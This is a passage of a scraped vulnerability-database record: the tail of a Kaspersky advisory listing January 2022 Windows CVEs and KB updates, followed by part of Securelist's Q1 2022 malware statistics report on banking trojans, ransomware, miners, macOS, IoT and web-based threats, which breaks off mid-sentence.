\n[CVE-2022-21883](<https://vulners.com/cve/CVE-2022-21883>)7.1High \n[CVE-2022-21882](<https://vulners.com/cve/CVE-2022-21882>)7.2High \n[CVE-2022-21902](<https://vulners.com/cve/CVE-2022-21902>)7.2High \n[CVE-2022-21833](<https://vulners.com/cve/CVE-2022-21833>)7.2High \n[CVE-2022-21877](<https://vulners.com/cve/CVE-2022-21877>)4.9Warning \n[CVE-2022-21871](<https://vulners.com/cve/CVE-2022-21871>)7.2High \n[CVE-2022-21890](<https://vulners.com/cve/CVE-2022-21890>)4.3Warning \n[CVE-2022-21917](<https://vulners.com/cve/CVE-2022-21917>)9.3Critical \n[CVE-2022-21893](<https://vulners.com/cve/CVE-2022-21893>)8.5Critical \n[CVE-2022-21904](<https://vulners.com/cve/CVE-2022-21904>)5.0Warning \n[CVE-2022-21876](<https://vulners.com/cve/CVE-2022-21876>)4.9Warning \n[CVE-2022-21848](<https://vulners.com/cve/CVE-2022-21848>)7.1High \n[CVE-2022-21847](<https://vulners.com/cve/CVE-2022-21847>)4.9Warning \n[CVE-2022-21896](<https://vulners.com/cve/CVE-2022-21896>)6.9High \n[CVE-2022-21961](<https://vulners.com/cve/CVE-2022-21961>)7.2High \n[CVE-2022-21887](<https://vulners.com/cve/CVE-2022-21887>)7.2High \n[CVE-2022-21884](<https://vulners.com/cve/CVE-2022-21884>)7.2High \n[CVE-2022-21897](<https://vulners.com/cve/CVE-2022-21897>)7.2High \n[CVE-2022-21857](<https://vulners.com/cve/CVE-2022-21857>)9.0Critical \n[CVE-2022-21862](<https://vulners.com/cve/CVE-2022-21862>)6.9High \n[CVE-2022-21878](<https://vulners.com/cve/CVE-2022-21878>)9.3Critical \n[CVE-2022-21858](<https://vulners.com/cve/CVE-2022-21858>)7.2High \n[CVE-2022-21849](<https://vulners.com/cve/CVE-2022-21849>)9.3Critical \n[CVE-2022-21921](<https://vulners.com/cve/CVE-2022-21921>)4.9Warning \n[CVE-2022-21906](<https://vulners.com/cve/CVE-2022-21906>)2.1Warning \n[CVE-2022-21873](<https://vulners.com/cve/CVE-2022-21873>)7.2High \n[CVE-2022-21899](<https://vulners.com/cve/CVE-2022-21899>)4.9Warning \n[CVE-2022-21885](<https://vulners.com/cve/CVE-2022-21885>)7.2High 
\n[CVE-2022-21895](<https://vulners.com/cve/CVE-2022-21895>)7.2High \n[CVE-2022-21914](<https://vulners.com/cve/CVE-2022-21914>)7.2High \n[CVE-2022-21861](<https://vulners.com/cve/CVE-2022-21861>)7.2High \n[CVE-2022-21872](<https://vulners.com/cve/CVE-2022-21872>)7.2High \n[CVE-2022-21892](<https://vulners.com/cve/CVE-2022-21892>)7.2High \n[CVE-2022-21869](<https://vulners.com/cve/CVE-2022-21869>)7.2High \n[CVE-2022-21843](<https://vulners.com/cve/CVE-2022-21843>)4.3Warning \n[CVE-2022-21863](<https://vulners.com/cve/CVE-2022-21863>)6.9High \n[CVE-2022-21916](<https://vulners.com/cve/CVE-2022-21916>)7.2High \n[CVE-2022-21962](<https://vulners.com/cve/CVE-2022-21962>)7.2High\n\n### *KB list*:\n[5009585](<http://support.microsoft.com/kb/5009585>) \n[5009546](<http://support.microsoft.com/kb/5009546>) \n[5009557](<http://support.microsoft.com/kb/5009557>) \n[5009586](<http://support.microsoft.com/kb/5009586>) \n[5009543](<http://support.microsoft.com/kb/5009543>) \n[5009619](<http://support.microsoft.com/kb/5009619>) \n[5009555](<http://support.microsoft.com/kb/5009555>) \n[5009595](<http://support.microsoft.com/kb/5009595>) \n[5009566](<http://support.microsoft.com/kb/5009566>) \n[5009545](<http://support.microsoft.com/kb/5009545>) \n[5009624](<http://support.microsoft.com/kb/5009624>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "kaspersky", "title": "KLA12422 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21839", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21917", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963", "CVE-2022-21964"], "modified": 
"2023-09-28T00:00:00", "id": "KLA12422", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12422/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2022-05-30T13:56:48", "description": "\n\n * [IT threat evolution in Q1 2022](<https://securelist.com/it-threat-evolution-q1-2022/106513/>)\n * **IT threat evolution in Q1 2022. Non-mobile statistics**\n * [IT threat evolution in Q1 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q1-2022-mobile-statistics/106589/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2022:\n\n * Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.\n * Web Anti-Virus recognized 313,164,030 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 107,848 unique users.\n * Ransomware attacks were defeated on the computers of 74,694 unique users.\n * Our File Anti-Virus detected 58,989,058 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2022 Kaspersky solutions blocked the launch of at least one piece of malware designed to steal money from bank accounts on the computers of 107,848 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231205/01-en-malware-report-q1-2022-pc.png>))_\n\n#### Geography of financial malware attacks\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of 
our products in that country or territory._\n\n_Geography of financial malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231231/02-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.5 \n2 | Afghanistan | 4.0 \n3 | Tajikistan | 3.9 \n4 | Yemen | 2.8 \n5 | Uzbekistan | 2.4 \n6 | China | 2.2 \n7 | Azerbaijan | 2.0 \n8 | Mauritania | 2.0 \n9 | Sudan | 1.8 \n10 | Syria | 1.8 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n#### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 36.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 16.7 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.7 \n4 | SpyEye | Trojan-Spy.Win32.SpyEye | 6.3 \n5 | Gozi | Trojan-Banker.Win32.Gozi | 5.2 \n6 | Cridex/Dridex | Trojan-Banker.Win32.Cridex | 3.5 \n7 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 3.3 \n8 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 2.2 \n10 | Danabot | Trojan-Banker.Win32.Danabot | 1.8 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nOur TOP 10 leader changed in Q1: the familiar ZeuS/Zbot (16.7%) dropped to second place and Ramnit/Nimnul (36.5%) took the lead. The TOP 3 was rounded out by CliptoShuffler (6.7%).\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Law enforcement successes\n\n * Several members of the REvil ransomware crime group were [arrested](<https://tass.com/society/1388613>) by Russian law enforcement in January. 
The Russian Federal Security Service (FSB) [says](<http://www.fsb.ru/fsb/press/message/single.htm!id=10439388%40fsbMessage.html>) it seized the following assets from the cybercriminals: "more than 426 million rubles ($5.6 million) including denominated in cryptocurrency; $600,000; 500,000 euros; computer equipment, the crypto wallets that were used to perpetrate crimes, and 20 luxury cars that were purchased with illicitly obtained money."\n * In February, a Canadian citizen was [sentenced](<https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/>) to 6 years and 8 months in prison for involvement in NetWalker ransomware attacks (also known as Mailto ransomware).\n * In January, Ukrainian police [arrested](<https://www.bleepingcomputer.com/news/security/ukranian-police-arrests-ransomware-gang-that-hit-over-50-firms/>) a ransomware gang who delivered an unclarified strain of malware via e-mail. According to the statement released by the police, over fifty companies in the United States and Europe were attacked by the cybercriminals.\n\n#### HermeticWiper, HermeticRansom and RUransom, etc.\n\nIn February, new malware was discovered which carried out attacks with the aim of destroying files. Two pieces of malware \u2014 a Trojan called HermeticWiper that destroys data and a cryptor called [HermeticRansom](<https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/>) \u2014 were both [used](<https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/>) in cyberattacks in Ukraine. That February, Ukrainian systems were attacked by another Trojan called IsaacWiper, followed by a third Trojan in March called CaddyWiper. 
The apparent aim of this malware family was to render infected computers unusable leaving no possibility of recovering files.\n\nAn intelligence team later discovered that HermeticRansom only superficially encrypts files, and ones encrypted by the ransomware [can be decrypted](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>).\n\nRUransom malware was discovered in March, which was created to encrypt files on computers in Russia. The analysis of the malicious code revealed it was developed to wipe data, as RUransom generates keys for all the victim's encrypted files without storing them anywhere.\n\n#### Conti source-code leak\n\nThe ransomware group Conti had its source code leaked along with its chat logs which were made public. It happened shortly after the Conti group [expressed](<https://www.theverge.com/2022/2/28/22955246/conti-ransomware-russia-ukraine-chat-logs-leaked>) support for the Russian government's actions on its website. The true identity of the individual who leaked the data is currently unknown. According to different versions, it could have been a researcher or an insider in the group who disagrees with its position.\n\nWhoever it may have been, the leaked ransomware source codes in the public domain will obviously be at the fingertips of other cybercriminals, which is what happened on more than one occasion with examples like [Hidden Tear](<https://securelist.com/hidden-tear-and-its-spin-offs/73565/>) and Babuk.\n\n#### Attacks on NAS devices\n\nNetwork-attached storage (NAS) devices continue to be targeted by ransomware attacks. A new [wave of Qlocker Trojan infections](<https://www.bleepingcomputer.com/news/security/qlocker-ransomware-returns-to-target-qnap-nas-devices-worldwide/>) on QNAP NAS devices occurred in January following a brief lull which lasted a few months. 
A new form of ransomware infecting QNAP NAS devices also appeared in the month of January called [DeadBolt](<https://www.bleepingcomputer.com/news/security/qnap-warns-of-new-deadbolt-ransomware-encrypting-nas-devices/>), and [ASUSTOR](<https://www.bleepingcomputer.com/news/security/deadbolt-ransomware-now-targets-asustor-devices-asks-50-btc-for-master-key/>) devices became its new target in February.\n\n#### Maze Decryptor\n\nMaster decryption keys for Maze, Sekhmet and Egregor ransomware were made public in February. The keys turned out to be authentic and we increased our support to decrypt files encrypted by these [infamous](<https://securelist.com/maze-ransomware/99137/>) forms of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) in our RakhniDecryptor utility. The decryptor is available on the website of our [No Ransom](<https://noransom.kaspersky.com/>) project and the website of the international NoMoreRansom project in the [Decryption Tools](<https://www.nomoreransom.org/en/decryption-tools.html>) section.\n\n### Number of new modifications\n\nIn Q1 2022, we detected eight new ransomware families and 3083 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2021 \u2014 Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231301/03-en-ru-es-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2022, Kaspersky products and technologies protected 74,694 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231325/04-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q1 2022 
([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231349/05-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.08 \n2 | Yemen | 1.52 \n3 | Mozambique | 0.82 \n4 | China | 0.49 \n5 | Pakistan | 0.43 \n6 | Angola | 0.40 \n7 | Iraq | 0.40 \n8 | Egypt | 0.40 \n9 | Algeria | 0.36 \n10 | Myanmar | 0.35 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 24.38 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 13.71 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.35 \n4 | (generic verdict) | Trojan-Ransom.Win32.Phny | 7.89 \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.66 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.07 \n7 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 3.72 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 3.37 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 3.17 \n10 | (generic verdict) | Trojan-Ransom.Win32.Agent | 1.99 \n \n_* Statistics are based on detection verdicts of Kaspersky products. 
The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q1 2022, Kaspersky solutions detected 21,282 new modifications of miners.\n\n_Number of new miner modifications, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231418/06-en-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 508,449 unique users of Kaspersky products and services worldwide.\n\n_Number of unique users attacked by miners, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231445/07-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231509/08-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 3.01 \n2 | Tajikistan | 2.60 \n3 | Rwanda | 2.45 \n4 | Uzbekistan | 2.15 \n5 | Kazakhstan | 1.99 \n6 | Tanzania | 1.94 \n7 | Ukraine | 1.83 \n8 | Pakistan | 1.79 \n9 | Mozambique | 1.69 \n10 | Venezuela | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarter highlights\n\nIn Q1 2022, a number of serious vulnerabilities were found in Microsoft Windows and its components. 
More specifically, the vulnerability [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) was found to be exploited by an unknown group of cybercriminals: a "type confusion" bug in the win32k.sys driver that an attacker can use to gain system privileges. Also worth noting is [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919>), a vulnerability in the User Profile Service which makes it possible to elevate privileges, along with [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21836>), which can be used to forge digital certificates.\n\nOne of the major talking points in Q1 was an exploit that targeted the [CVE-2022-0847](<https://dirtypipe.cm4all.com/>) vulnerability in the Linux OS kernel. It was dubbed "Dirty Pipe". [Researchers discovered](<https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/>) an "uninitialized memory" vulnerability when analyzing corrupted files, which makes it possible to rewrite a part of the OS memory, namely page memory that contains system files' data. This in turn opens up opportunities such as elevating an attacker's privileges to root. It's worth noting that this vulnerability is fairly easy to exploit, which means users of all systems should regularly install security patches and use all available means to prevent infection.\n\nWhen it comes to network threats, this quarter continued to show how cybercriminals often resort to the technique of brute-forcing passwords to gain unauthorized access to various network services, the most popular of which are MSSQL, RDP and SMB. Attacks using the EternalBlue, EternalRomance and similar exploits remain as popular as ever. Due to widespread unpatched versions of Microsoft Exchange Server, networks often fall victim to exploits of ProxyToken, ProxyShell, ProxyOracle and other vulnerabilities. 
One example of a critical vulnerability found is remote code execution (RCE) in the Microsoft Windows HTTP protocol stack which allows an attack to be launched remotely by sending a special network packet to a vulnerable system by means of the HTTP trailer functionality. New attacks on network applications which will probably also become common are RCE attacks on the popular Spring Framework and Spring Cloud Gateway. Specific examples of vulnerabilities in these applications are [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) (Spring4Shell) and [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>).\n\n### Vulnerability statistics\n\nQ1 2022 saw an array of changes in the statistics on common vulnerability types. For instance, the top place in the statistics is still firmly held by exploits targeting vulnerabilities in Microsoft Office and their share has increased significantly to 78.5%. The same common vulnerabilities we've written about on more than one occasion are still the most widely exploited within this category of threats. These are [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which cause a buffer overflow when processing objects in a specially crafted document in the Equation Editor component and ultimately allow an attacker to execute arbitrary code. There's also [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), where opening a specially crafted file with an affected version of Microsoft Office software gives attackers the opportunity to perform various actions on the vulnerable system. 
Another vulnerability found last year which is very popular with cybercriminals is [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which they exploit through a specially prepared Microsoft Office document with an embedded malicious ActiveX control to execute arbitrary code on the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231538/09-en-malware-report-q1-2022-pc.png>))_\n\nExploits targeting browsers came second again in Q1, although their share dropped markedly to just 7.64%. Browser developers put a great deal of effort into patching vulnerabilities in each new version and closing a large number of security gaps. Apart from that, the majority of browsers update automatically, unlike Microsoft Office, where many users still run outdated versions and are in no rush to install security updates. That could be precisely the reason why we've seen a reduction in the share of browser exploits in our statistics. However, this does not mean they're no longer an immediate threat. 
For instance, Chrome's developers fixed a number of critical RCE vulnerabilities, including:\n\n * [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>): a "type confusion" vulnerability in the V8 script engine which gives attackers the opportunity to remotely execute code (RCE) in the context of the browser's security sandbox.\n * [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>): a use-after-free vulnerability which allows an attacker to corrupt process memory and remotely execute arbitrary code when specially crafted scripts that use animation are run.\n\nSimilar vulnerabilities were found in the browser's other components: [CVE-2022-0605](<https://nvd.nist.gov/vuln/detail/CVE-2022-0605>), which involves the Web Store API, and [CVE-2022-0606](<https://nvd.nist.gov/vuln/detail/CVE-2022-0606>), which is associated with vulnerabilities in the WebGL backend (ANGLE). Another vulnerability found was [CVE-2022-0604](<https://nvd.nist.gov/vuln/detail/CVE-2022-0604>), a heap buffer overflow in Tab Groups that also potentially leads to remote code execution (RCE).\n\nExploits for Android came third in our statistics (4.10%), followed by exploits targeting the Adobe Flash Platform (3.49%), PDF files (3.48%) and Java apps (2.79%).\n\n## Attacks on macOS\n\nThe year began with a number of interesting multi-platform finds: the [Gimmick](<https://www.securityweek.com/chinese-cyberspies-seen-using-macos-variant-gimmick-malware>) multi-platform malware family with Windows and macOS variants that uses Google Drive to communicate with the C&C server, along with the [SysJoker backdoor](<https://threatpost.com/undetected-sysjoker-backdoor-malwarewindows-linux-macos/177532/>) with versions tailored for Windows, Linux and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 13.23 \n2 | AdWare.OSX.Pirrit.j | 12.05 \n3 | Monitor.OSX.HistGrabber.b | 8.83 \n4 | 
AdWare.OSX.Pirrit.o | 7.53 \n5 | AdWare.OSX.Bnodlero.at | 7.41 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.06 \n7 | AdWare.OSX.Pirrit.aa | 6.75 \n8 | AdWare.OSX.Pirrit.ae | 6.07 \n9 | AdWare.OSX.Cimpli.m | 5.35 \n10 | Trojan-Downloader.OSX.Agent.h | 4.96 \n11 | AdWare.OSX.Pirrit.gen | 4.76 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Bnodlero.ax | 4.45 \n14 | AdWare.OSX.Agent.gen | 3.74 \n15 | AdWare.OSX.Agent.q | 3.37 \n16 | Backdoor.OSX.Twenbc.b | 2.84 \n17 | Trojan-Downloader.OSX.AdLoad.mc | 2.81 \n18 | Trojan-Downloader.OSX.Lador.a | 2.81 \n19 | AdWare.OSX.Bnodlero.ay | 2.81 \n20 | Backdoor.OSX.Agent.z | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nThe TOP 20 threats to users detected by Kaspersky security solutions for macOS is usually dominated by various adware apps. The top two places in the rating were taken by adware apps from the AdWare.OSX.Pirrit family, while third place was taken by a member of the Monitor.OSX.HistGrabber.b family of potentially unwanted software which sends users' browser history to its owners' servers.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231608/10-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 2.36 \n2 | Spain | 2.29 \n3 | Italy | 2.16 \n4 | Canada | 2.15 \n5 | India | 1.95 \n6 | United States | 1.90 \n7 | Russian Federation | 1.83 \n8 | United Kingdom | 1.58 \n9 | Mexico | 1.49 \n10 | Australia | 1.36 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2022, the country where the most users 
were attacked was France (2.36%), followed by Spain (2.29%) and Italy (2.16%). Adware from the Pirrit family was encountered most frequently out of all macOS threats in the listed countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol as before. Just one quarter of devices attempted to brute-force our SSH traps.\n\nTelnet | 75.28% \n---|--- \nSSH | 24.72% \n \n**_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2022_**\n\nIf we look at sessions involving Kaspersky honeypots, we see far greater Telnet dominance.\n\nTelnet | 93.16% \n---|--- \nSSH | 6.84% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.07 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26 \n3 | Backdoor.Linux.Mirai.ba | 7.95 \n4 | Backdoor.Linux.Gafgyt.a | 5.55 \n5 | Trojan-Downloader.Shell.Agent.p | 4.62 \n6 | Backdoor.Linux.Mirai.ad | 3.89 \n7 | Backdoor.Linux.Gafgyt.bj | 3.02 \n8 | Backdoor.Linux.Agent.bc | 2.76 \n9 | RiskTool.Linux.BitCoinMiner.n | 2.00 \n10 | Backdoor.Linux.Mirai.cw | 1.98 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nSimilar IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q1-2022/105045/#attacks-on-iot-honeypots>) for Q1 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q1 2022, Kaspersky solutions blocked 1,216,350,437 attacks launched from online resources across the globe. 313,164,030 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231643/11-en-malware-report-q1-2022-pc.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 22.63 \n2 | Tunisia | 21.57 \n3 | Algeria | 16.41 \n4 | Mongolia | 16.05 \n5 | Serbia | 15.96 \n6 | Libya | 15.67 \n7 | Estonia | 14.45 \n8 | Greece | 14.37 \n9 | Nepal | 14.01 \n10 | Hong Kong | 13.85 \n11 | Yemen | 13.17 \n12 | Sudan | 13.08 \n13 | Slovenia | 12.94 \n14 | Morocco | 12.82 \n15 | Qatar | 12.78 \n16 | Croatia | 12.53 \n17 | Republic of Malawi | 12.33 \n18 | Sri Lanka | 12.28 \n19 | Bangladesh | 12.26 \n20 | Palestine | 12.23 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country or territory._\n\nOn average during the quarter, 8.18% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/27074233/13-en-malware-report-q1-2022-pc-1.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. 
